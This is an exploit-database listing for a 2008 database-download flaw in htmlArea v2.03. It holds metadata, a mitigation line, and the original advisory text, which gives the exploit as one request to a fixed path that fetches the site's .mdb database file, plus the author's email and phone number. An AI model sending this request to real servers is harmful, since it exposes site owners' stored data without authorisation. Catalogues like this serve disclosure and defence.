header-logo
Suggest Exploit
vendor:
htmlArea
by:
indoushka
7.5
CVSS
HIGH
DB Download Vulnerability
200
CWE
Product Name: htmlArea
Affected Version From: 02.03
Affected Version To: 02.03
Patch Exists: NO
Related CWE: N/A
CPE: a:interactive_tools:htmlarea
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
2008

htmlArea v2.03 DB Download Vulnerability

The vulnerability allows an attacker to download the database of the htmlArea v2.03 application. The attacker can access the database by sending a request to the URL http://server/htmlArea/data/newsdata.mdb.

Mitigation:

The vendor should ensure that the database is not accessible from the web server.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : htmlArea v2.03 DB Download Vulnerability                                |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : htmlArea v2.03                                                          |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : DB                                                                      | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://server/htmlArea/data/newsdata.mdb
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * 
-------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR